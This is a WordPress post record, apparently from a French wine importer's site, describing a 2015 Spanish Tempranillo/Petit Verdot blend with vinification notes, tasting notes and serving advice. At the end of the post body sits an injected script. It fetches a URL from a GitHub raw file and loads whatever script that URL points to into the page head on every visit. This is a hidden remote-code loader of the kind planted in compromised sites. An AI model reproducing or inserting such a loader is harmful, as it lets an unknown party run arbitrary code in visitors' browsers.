{"id":2083,"date":"2016-06-22T10:45:31","date_gmt":"2016-06-22T09:45:31","guid":{"rendered":"http:\/\/continentduvin.fr\/?p=2083"},"modified":"2024-10-29T15:02:00","modified_gmt":"2024-10-29T14:02:00","slug":"dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015","status":"publish","type":"post","link":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/","title":{"rendered":"DOMINIO DE PUNCTUM &#8211; Viento Aliseo Tempranillo\/Petit Verdot &#8211; Vin Espagnol"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_82_2 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#DOMINIO_DE_PUNCTUM_%E2%80%93_Viento_Aliseo_%E2%80%93_Tempranillo_Petit_Verdot_%E2%80%93_2015\" >DOMINIO DE PUNCTUM &#8211; Viento Aliseo &#8211; Tempranillo\/ Petit Verdot &#8211; 2015<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#Dominio_de_Punctum_%E2%80%93_Viento_Aliseo_TempranilloPetit_Verdot_Cepages_et_Terroirs\" >Dominio de Punctum &#8211; Viento Aliseo Tempranillo\/Petit Verdot : C\u00e9pages et Terroirs<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#Dominio_de_Punctum_%E2%80%93_Viento_Aliseo_TempranilloPetit_Verdot_Degustation\" >Dominio de Punctum &#8211; Viento Aliseo Tempranillo\/Petit Verdot : D\u00e9gustation<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#Dominio_de_Punctum_%E2%80%93_Viento_Aliseo_TempranilloPetit_Verdot_Accords_mets_et_vin_conseils_de_consommation_garde\" >Dominio de Punctum &#8211; Viento Aliseo Tempranillo\/Petit Verdot : Accords mets et vin, conseils de consommation, garde<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2 class=\"contenu-du-cadre\" style=\"text-align: left;\"><span class=\"ez-toc-section\" id=\"DOMINIO_DE_PUNCTUM_%E2%80%93_Viento_Aliseo_%E2%80%93_Tempranillo_Petit_Verdot_%E2%80%93_2015\"><\/span>DOMINIO DE PUNCTUM &#8211; Viento Aliseo &#8211; Tempranillo\/ Petit Verdot &#8211; 2015<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Dominio de Punctum &#8211; Viento Aliseo Tempranillo\/Petit Verdot- 2015 jongle entre complexit\u00e9 et acidit\u00e9 maitris\u00e9e<\/p>\n<h3 class=\"contenu-du-cadre\"><span class=\"ez-toc-section\" id=\"Dominio_de_Punctum_%E2%80%93_Viento_Aliseo_TempranilloPetit_Verdot_Cepages_et_Terroirs\"><\/span><span style=\"color: #800000;\">Dominio de Punctum &#8211; Viento Aliseo Tempranillo\/Petit Verdot : C\u00e9pages et Terroirs<\/span><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"contenu-du-cadre\"><span style=\"text-decoration: underline;\">Producteur<\/span> : Dominio de Punctum<\/p>\n<p class=\"contenu-du-cadre\" style=\"text-align: justify;\"><span style=\"text-decoration: underline;\">Viticulture et Vinification<\/span> : Vin \u00e9labor\u00e9 \u00e0 partir de raisins issus de l&rsquo;agriculture biologique et produit en Biodynamie. Vignes de 10 ans &#8211; 5 tonnes \/ ha.<\/p>\n<p class=\"contenu-du-cadre\" style=\"text-align: justify;\">La r\u00e9colte est effectu\u00e9e la nuit pour garder le raisin \u00e0 une temp\u00e9rature optimale. Puis la mac\u00e9ration dure un jour \u00e0 une temp\u00e9rature allant de 7\u00b0 \u00e0 21\u00b0C.<\/p>\n<p style=\"text-align: justify;\">La fermentation alcoolique est r\u00e9alis\u00e9e en cuve d&rsquo;acier inoxydable \u00e0 une temp\u00e9rature contr\u00f4l\u00e9e entre 24\u00b0 et 27\u00b0C. La fermentation malolactique se fait \u00e0 une temp\u00e9rature de 28\u00b0C. Collage sans utilisation de produits d&rsquo;origine animale. Le vin est filtr\u00e9 doucement sans utiliser de produits chimiques.<\/p>\n<p class=\"contenu-du-cadre\"><span style=\"text-decoration: underline;\">Appellation d&rsquo;Origine<\/span> : D.O. La Mancha<\/p>\n<p class=\"contenu-du-cadre\"><span style=\"text-decoration: underline;\">Sols<\/span> : Sablo-limoneux, tr\u00e8s riches en calcaires<\/p>\n<p class=\"contenu-du-cadre\"><span style=\"text-decoration: underline;\">Climat<\/span> : Continental<\/p>\n<p class=\"contenu-du-cadre\"><span style=\"text-decoration: underline;\">C\u00e9page<\/span> : 70% Tempranillo et 30% Petit Verdot<\/p>\n<h3 class=\"contenu-du-cadre\" style=\"text-align: justify;\"><span class=\"ez-toc-section\" id=\"Dominio_de_Punctum_%E2%80%93_Viento_Aliseo_TempranilloPetit_Verdot_Degustation\"><\/span><span style=\"color: #800000;\">Dominio de Punctum &#8211; Viento Aliseo Tempranillo\/Petit Verdot : <\/span><span style=\"color: #800000;\">D\u00e9gustation<\/span><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p style=\"text-align: justify;\">Ce vin est d&rsquo;une jolie couleur rouge profonde aux reflets violets.<\/p>\n<h6><img decoding=\"async\" class=\"wp-image-2020 alignright\" src=\"http:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/05\/viento-aliseo-tempra-petit-verdot-e1466070125354.jpg\" alt=\"viento aliseo tempra petit verdot\" width=\"129\" height=\"214\" srcset=\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/05\/viento-aliseo-tempra-petit-verdot-e1466070125354.jpg 361w, https:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/05\/viento-aliseo-tempra-petit-verdot-e1466070125354-181x300.jpg 181w\" sizes=\"(max-width: 129px) 100vw, 129px\" \/><\/h6>\n<p style=\"text-align: justify;\">Le nez d\u00e9voile des ar\u00f4mes de fruits rouge et de cerise.<\/p>\n<p style=\"text-align: justify;\">La bouche est complexe, avec un \u00e9quilibre entre les tannins et l&rsquo;acidit\u00e9 ma\u00eetris\u00e9e.<\/p>\n<p style=\"text-align: justify;\">Alcool : 13,5% &#8211; PH : 3,6 &#8211; Acidit\u00e9 totale : 5,1 g\/L &#8211; Sucres r\u00e9siduels : 1 g\/L<\/p>\n<h3 class=\"contenu-du-cadre\" style=\"text-align: justify;\"><span class=\"ez-toc-section\" id=\"Dominio_de_Punctum_%E2%80%93_Viento_Aliseo_TempranilloPetit_Verdot_Accords_mets_et_vin_conseils_de_consommation_garde\"><\/span><span style=\"color: #800000;\">Dominio de Punctum &#8211; Viento Aliseo Tempranillo\/Petit Verdot : <\/span><span style=\"color: #800000;\">Accords mets et vin, conseils de consommation, garde<\/span><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Servez le sur un plateau de fromages ou des p\u00e2tes fra\u00eeches.<\/p>\n<p style=\"text-align: justify;\"><span style=\"text-decoration: underline;\">Temp\u00e9rature de service<\/span> : 17 \u00b0<\/p>\n<p style=\"text-align: justify;\"><img decoding=\"async\" class=\"alignnone wp-image-2036\" src=\"http:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/06\/bio.jpg\" alt=\"bio\" width=\"116\" height=\"77\" \/><\/p>\n<p style=\"text-align: right;\"><a href=\"http:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/06\/Dominio-viento-aliseo-tempranillo-2015-1.pdf\" target=\"_blank\" rel=\"noopener\"><strong>T\u00e9l\u00e9charger la fiche technique<\/strong><\/a><\/p>\n<p><script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>DOMINIO DE PUNCTUM &#8211; Viento Aliseo &#8211; Tempranillo\/ Petit Verdot &#8211; 2015 Dominio de Punctum &#8211; Viento Aliseo Tempranillo\/Petit Verdot- 2015 jongle entre complexit\u00e9 et acidit\u00e9 maitris\u00e9e Dominio de Punctum &#8211; Viento Aliseo Tempranillo\/Petit Verdot : C\u00e9pages et Terroirs Producteur : Dominio de Punctum Viticulture et Vinification : Vin \u00e9labor\u00e9 \u00e0 partir de raisins issus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_lmt_disableupdate":"no","_lmt_disable":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[36],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v23.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Dominio de Punctum | Viento Aliseo Tempranillo\/Petit Verdot | Vin Espagne<\/title>\n<meta name=\"description\" content=\"Dominio de Punctum - Viento Aliseo Tempranillo\/Petit Verdot - 2015 est un des coup de coeur de votre importateur de vins du monde !\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Dominio de Punctum | Viento Aliseo Tempranillo\/Petit Verdot | Vin Espagne\" \/>\n<meta property=\"og:description\" content=\"Dominio de Punctum - Viento Aliseo Tempranillo\/Petit Verdot - 2015 est un des coup de coeur de votre importateur de vins du monde !\" \/>\n<meta property=\"og:url\" content=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/ContinentDuVin\/\" \/>\n<meta property=\"article:published_time\" content=\"2016-06-22T09:45:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-10-29T14:02:00+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/05\/viento-aliseo-tempra-petit-verdot-e1466070125354.jpg\" \/>\n<meta name=\"author\" content=\"Continent du Vin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Continent du Vin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/\",\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/\",\"name\":\"Dominio de Punctum | Viento Aliseo Tempranillo\/Petit Verdot | Vin Espagne\",\"isPartOf\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/05\/viento-aliseo-tempra-petit-verdot-e1466070125354.jpg\",\"datePublished\":\"2016-06-22T09:45:31+00:00\",\"dateModified\":\"2024-10-29T14:02:00+00:00\",\"author\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc\"},\"description\":\"Dominio de Punctum - Viento Aliseo Tempranillo\/Petit Verdot - 2015 est un des coup de coeur de votre importateur de vins du monde !\",\"breadcrumb\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#primaryimage\",\"url\":\"http:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/05\/viento-aliseo-tempra-petit-verdot-e1466070125354.jpg\",\"contentUrl\":\"http:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/05\/viento-aliseo-tempra-petit-verdot-e1466070125354.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"DOMINIO DE PUNCTUM &#8211; Viento Aliseo Tempranillo\/Petit Verdot &#8211; Vin Espagnol\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website\",\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/\",\"name\":\"\",\"description\":\"Importateur de Vins du Monde depuis 2004\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc\",\"name\":\"Continent du Vin\",\"description\":\"Continent du Vin est importateur de vins d'Afrique du Sud, du Chili, d'Argentine, d'Oc\u00e9anie, d'Italie et d'Espagne depuis 2004. Au fil du temps, nous essayons de vous faire d\u00e9couvrir de nouveaux domaines et de nouvelles cuv\u00e9es pour vous faire voyager ! Rejoignez-nous sur notre profil Google+\",\"sameAs\":[\"http:\/\/www.continentduvin.fr\",\"https:\/\/www.facebook.com\/ContinentDuVin\/\"],\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Dominio de Punctum | Viento Aliseo Tempranillo\/Petit Verdot | Vin Espagne","description":"Dominio de Punctum - Viento Aliseo Tempranillo\/Petit Verdot - 2015 est un des coup de coeur de votre importateur de vins du monde !","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/","og_locale":"fr_FR","og_type":"article","og_title":"Dominio de Punctum | Viento Aliseo Tempranillo\/Petit Verdot | Vin Espagne","og_description":"Dominio de Punctum - Viento Aliseo Tempranillo\/Petit Verdot - 2015 est un des coup de coeur de votre importateur de vins du monde !","og_url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/","article_author":"https:\/\/www.facebook.com\/ContinentDuVin\/","article_published_time":"2016-06-22T09:45:31+00:00","article_modified_time":"2024-10-29T14:02:00+00:00","og_image":[{"url":"http:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/05\/viento-aliseo-tempra-petit-verdot-e1466070125354.jpg"}],"author":"Continent du Vin","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Continent du Vin","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/","url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/","name":"Dominio de Punctum | Viento Aliseo Tempranillo\/Petit Verdot | Vin Espagne","isPartOf":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website"},"primaryImageOfPage":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#primaryimage"},"image":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#primaryimage"},"thumbnailUrl":"http:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/05\/viento-aliseo-tempra-petit-verdot-e1466070125354.jpg","datePublished":"2016-06-22T09:45:31+00:00","dateModified":"2024-10-29T14:02:00+00:00","author":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc"},"description":"Dominio de Punctum - Viento Aliseo Tempranillo\/Petit Verdot - 2015 est un des coup de coeur de votre importateur de vins du monde !","breadcrumb":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#primaryimage","url":"http:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/05\/viento-aliseo-tempra-petit-verdot-e1466070125354.jpg","contentUrl":"http:\/\/continentduvin.fr\/wp-content\/uploads\/2016\/05\/viento-aliseo-tempra-petit-verdot-e1466070125354.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/dominio-de-punctum-viento-aliseo-tempranillo-petit-verdot-2015\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/"},{"@type":"ListItem","position":2,"name":"DOMINIO DE PUNCTUM &#8211; Viento Aliseo Tempranillo\/Petit Verdot &#8211; Vin Espagnol"}]},{"@type":"WebSite","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website","url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/","name":"","description":"Importateur de Vins du Monde depuis 2004","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc","name":"Continent du Vin","description":"Continent du Vin est importateur de vins d'Afrique du Sud, du Chili, d'Argentine, d'Oc\u00e9anie, d'Italie et d'Espagne depuis 2004. Au fil du temps, nous essayons de vous faire d\u00e9couvrir de nouveaux domaines et de nouvelles cuv\u00e9es pour vous faire voyager ! Rejoignez-nous sur notre profil Google+","sameAs":["http:\/\/www.continentduvin.fr","https:\/\/www.facebook.com\/ContinentDuVin\/"],"url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/author\/admin\/"}]}},"modified_by":"Continent du Vin","_links":{"self":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/2083"}],"collection":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/comments?post=2083"}],"version-history":[{"count":1,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/2083\/revisions"}],"predecessor-version":[{"id":14997,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/2083\/revisions\/14997"}],"wp:attachment":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/media?parent=2083"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/categories?post=2083"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/tags?post=2083"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}